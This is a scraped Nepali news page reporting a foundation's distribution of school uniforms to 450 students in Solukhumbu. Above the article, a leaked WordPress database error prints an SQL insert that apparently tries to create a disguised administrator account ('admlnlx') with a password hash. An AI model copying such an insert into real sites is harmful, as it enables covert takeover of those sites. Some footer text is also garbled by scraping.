WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BcsROxDP1vU4XWbNAaPFGQBWMtWvNL.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 09:21:20', '', 'admlnlx', 'admlnlx')

मनभिसो फाउण्डेसनद्वारा माप्यका ४ सय भन्दा बढिलाई पोषाक वितरण – Gaule Khabar

मनभिसो फाउण्डेसनद्वारा माप्यका ४ सय भन्दा बढिलाई पोषाक वितरण

मनभिसो फाउण्डेसनद्वारा माप्यका ४ सय भन्दा बढिलाई पोषाक वितरण

सोलुखुम्बु । माप्यदुधकोशी गाउँपालिका ६ स्थित सगरमाथ माबीका ४ सय बढी विद्यार्थीलाई विद्यालय पोषाक वितरण गरिएको छ ।

माविमा अध्ययनरत ४५० जना विद्यार्थीलाई हिजो मंगलबार मनभिसो फाउन्डेसनले एक-एक सेटका दरले पोषाक वितरण गरेको हो ।

लामो समयदेखि शैक्षिक क्षेत्रमा सहयोग गर्दै आएको गैरसरकारी संस्था मन भिसोले विद्यालयमा एक कार्यक्रमका विच कपडा वितरणगरेको थियो ।

कार्यक्रममा मनभिसो फाउन्डेसनका अध्यक्ष छोङ्बा लामा, स्थानीय जनप्रतिनिधि, विद्यालयका शिक्षक तथा विद्यार्थी, अभिभावकको बाक्लो उपस्थिती रहेको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका